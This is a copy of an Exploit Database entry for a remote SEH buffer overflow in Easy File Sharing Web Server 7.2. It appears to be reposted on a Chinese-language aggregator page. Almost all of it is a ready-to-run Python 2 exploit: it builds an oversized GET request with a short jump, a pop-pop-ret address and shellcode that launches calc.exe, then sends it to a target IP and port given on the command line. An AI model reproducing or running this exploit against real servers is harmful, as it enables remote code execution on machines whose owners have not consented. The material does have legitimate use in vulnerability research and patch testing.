Easy File Sharing Web Server 7.2 – GET Buffer Overflow (SEH)

• Exploit Database
• 15 阅读

• 作者： ArminCyber
  日期： 2015-12-16
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39008/

• # Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow
  # Date: 12/2/2015
  # Exploit Author: ArminCyber
  # Contact: Armin.Exploit@gmail.com
  # Version: 7.2
  # Tested on: XP SP3 EN
  # category: Remote Exploit
  # Usage: ./exploit.py ip port
  
  import socket
  import sys
  
  host = str(sys.argv[1])
  port = int(sys.argv[2])
  
  a = socket.socket()
  
  print "Connecting to: " + host + ":" + str(port)
  a.connect((host,port))
  
  entire=4500
  
  # Junk
  buff = "A"*4061
  
  # Next SEH
  buff+= "\xeb\x0A\x90\x90"
  
  # pop pop ret
  buff+= "\x98\x97\x01\x10"
  
  buff+= "\x90"*19
  
  # calc.exe
  # Bad Characters: \x20 \x2f \x5c
  shellcode = (
  "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
  "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
  "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
  "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
  "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
  "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
  "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
  "\x1c\x39\xbd"
  )
  buff+= shellcode
  
  buff+= "\x90"*7
  
  buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)
  
  # GET
  a.send("GET " + buff + " HTTP/1.0\r\n\r\n")
  
  a.close()
  
  print "Done..."